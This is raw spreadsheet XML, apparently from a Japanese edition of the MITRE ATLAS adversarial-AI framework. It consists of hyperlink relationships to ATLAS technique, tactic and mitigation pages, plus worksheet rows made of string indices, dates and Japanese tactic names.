Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0019" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0017.000" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0050" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0013" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0078" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.004" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.002" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0055" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.002" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011.001" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002.001" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0004" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.002" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0035" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0067.000" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0029" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0056" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051.001" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.001" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.000" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0006" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0007" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0044" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.001" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0074" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0052" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.000" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0058" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0003" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0052.000" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0079" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0040" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.001" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.001" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.002" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.002" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0063" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0071" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.000" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.001" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.001" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.002" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0047" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0001" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.000" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0017" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.002" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0031" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0025" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0068" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0070" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0035" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.000" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0020" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.004" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.002" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051.000" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0062" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0073" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.000" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.000" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.000" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.003" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0046" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.004" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0036" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0049" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0061" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0076" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0059" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0057" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.001" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.001" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.003"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atlas.mitre.org/tactics/AML.TA0005" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0012" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0009" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0008" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0006" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0000" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0001" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0007" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0004" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0013" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0003" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0011" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0014" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0010" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0002"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atlas.mitre.org/mitigations/AML.M0012" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0001" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0011" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0016" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0024" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0006" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0019" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0010" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0002" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0014" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0017" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0003" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0007" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0023" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0005" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0022" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0008" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0013" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0025" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0018" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0021" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0004" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0015" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0020" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0000" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M0009" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/mitigations/AML.M00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41"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A44" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="D103" sqref="D103"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="19.08984375" style="17" customWidth="1"/>
    <col min="2" max="2" width="57.08984375" style="18" customWidth="1"/>
    <col min="3" max="3" width="44.90625" style="17" customWidth="1"/>
    <col min="4" max="4" width="255.6328125" style="18" customWidth="1"/>
    <col min="5" max="5" width="64.1796875" style="18" customWidth="1"/>
    <col min="6" max="7" width="15.7265625" style="17" customWidth="1"/>
    <col min="8" max="8" width="44" style="17" customWidth="1"/>
    <col min="9" max="9" width="22.08984375" style="17" customWidth="1"/>
    <col min="10" max="16384" width="9" style="17"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A1" s="9" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="9" t="s">
        <v>478</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>479</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>480</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>481</v>
      </c>
      <c r="G1" s="9" t="s">
        <v>482</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>483</v>
      </c>
      <c r="I1" s="20" t="s">
        <v>484</v>
      </c>
    </row>
    <row r="2" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A2" s="29" t="s">
        <v>827</v>
      </c>
      <c r="B2" s="11" t="s">
        <v>828</v>
      </c>
      <c r="C2" s="21" t="s">
        <v>905</v>
      </c>
      <c r="D2" s="21" t="s">
        <v>932</v>
      </c>
      <c r="E2" s="12" t="s">
        <v>829</v>
      </c>
      <c r="F2" s="28">
        <v>45930</v>
      </c>
      <c r="G2" s="28">
        <v>45943</v>
      </c>
      <c r="H2" s="10" t="str">
        <f>'tactics (ja)'!$C$14</f>
        <v>永続化</v>
      </c>
      <c r="I2" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="3" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A3" s="29" t="s">
        <v>198</v>
      </c>
      <c r="B3" s="11" t="s">
        <v>830</v>
      </c>
      <c r="C3" s="21" t="s">
        <v>906</v>
      </c>
      <c r="D3" s="21" t="s">
        <v>933</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>199</v>
      </c>
      <c r="F3" s="28">
        <v>45224</v>
      </c>
      <c r="G3" s="28">
        <v>45965</v>
      </c>
      <c r="H3" s="10" t="str">
        <f>'tactics (ja)'!$C$9&amp;"、"&amp;'tactics (ja)'!$C$15</f>
        <v>実行、権限昇格</v>
      </c>
      <c r="I3" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4" s="29" t="s">
        <v>831</v>
      </c>
      <c r="B4" s="11" t="s">
        <v>832</v>
      </c>
      <c r="C4" s="21" t="s">
        <v>907</v>
      </c>
      <c r="D4" s="21" t="s">
        <v>934</v>
      </c>
      <c r="E4" s="12" t="s">
        <v>833</v>
      </c>
      <c r="F4" s="28">
        <v>45930</v>
      </c>
      <c r="G4" s="28">
        <v>45930</v>
      </c>
      <c r="H4" s="10" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I4" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A5" s="10" t="s">
        <v>2</v>
      </c>
      <c r="B5" s="11" t="s">
        <v>3</v>
      </c>
      <c r="C5" s="11" t="s">
        <v>485</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>486</v>
      </c>
      <c r="E5" s="12" t="s">
        <v>4</v>
      </c>
      <c r="F5" s="13">
        <v>44329</v>
      </c>
      <c r="G5" s="13">
        <v>45756</v>
      </c>
      <c r="H5" s="10" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I5" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A6" s="10" t="s">
        <v>7</v>
      </c>
      <c r="B6" s="11" t="s">
        <v>8</v>
      </c>
      <c r="C6" s="10" t="s">
        <v>487</v>
      </c>
      <c r="D6" s="11" t="s">
        <v>488</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>9</v>
      </c>
      <c r="F6" s="13">
        <v>44329</v>
      </c>
      <c r="G6" s="13">
        <v>45756</v>
      </c>
      <c r="H6" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I6" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A7" s="10" t="s">
        <v>10</v>
      </c>
      <c r="B7" s="11" t="s">
        <v>11</v>
      </c>
      <c r="C7" s="10" t="s">
        <v>489</v>
      </c>
      <c r="D7" s="11" t="s">
        <v>490</v>
      </c>
      <c r="E7" s="12" t="s">
        <v>12</v>
      </c>
      <c r="F7" s="13">
        <v>44329</v>
      </c>
      <c r="G7" s="13">
        <v>45756</v>
      </c>
      <c r="H7" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I7" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A8" s="10" t="s">
        <v>13</v>
      </c>
      <c r="B8" s="11" t="s">
        <v>14</v>
      </c>
      <c r="C8" s="10" t="s">
        <v>491</v>
      </c>
      <c r="D8" s="11" t="s">
        <v>492</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>15</v>
      </c>
      <c r="F8" s="13">
        <v>44329</v>
      </c>
      <c r="G8" s="13">
        <v>45728</v>
      </c>
      <c r="H8" s="10" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I8" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A9" s="10" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="11" t="s">
        <v>17</v>
      </c>
      <c r="C9" s="10" t="s">
        <v>493</v>
      </c>
      <c r="D9" s="11" t="s">
        <v>494</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>18</v>
      </c>
      <c r="F9" s="13">
        <v>44329</v>
      </c>
      <c r="G9" s="13">
        <v>45756</v>
      </c>
      <c r="H9" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I9" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="10" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A10" s="10" t="s">
        <v>19</v>
      </c>
      <c r="B10" s="11" t="s">
        <v>20</v>
      </c>
      <c r="C10" s="10" t="s">
        <v>495</v>
      </c>
      <c r="D10" s="11" t="s">
        <v>496</v>
      </c>
      <c r="E10" s="12" t="s">
        <v>21</v>
      </c>
      <c r="F10" s="13">
        <v>44329</v>
      </c>
      <c r="G10" s="13">
        <v>45756</v>
      </c>
      <c r="H10" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I10" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="11" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A11" s="10" t="s">
        <v>22</v>
      </c>
      <c r="B11" s="11" t="s">
        <v>23</v>
      </c>
      <c r="C11" s="10" t="s">
        <v>497</v>
      </c>
      <c r="D11" s="11" t="s">
        <v>498</v>
      </c>
      <c r="E11" s="12" t="s">
        <v>24</v>
      </c>
      <c r="F11" s="13">
        <v>44329</v>
      </c>
      <c r="G11" s="13">
        <v>45756</v>
      </c>
      <c r="H11" s="10" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I11" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="12" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A12" s="10" t="s">
        <v>25</v>
      </c>
      <c r="B12" s="11" t="s">
        <v>26</v>
      </c>
      <c r="C12" s="15" t="s">
        <v>499</v>
      </c>
      <c r="D12" s="21" t="s">
        <v>834</v>
      </c>
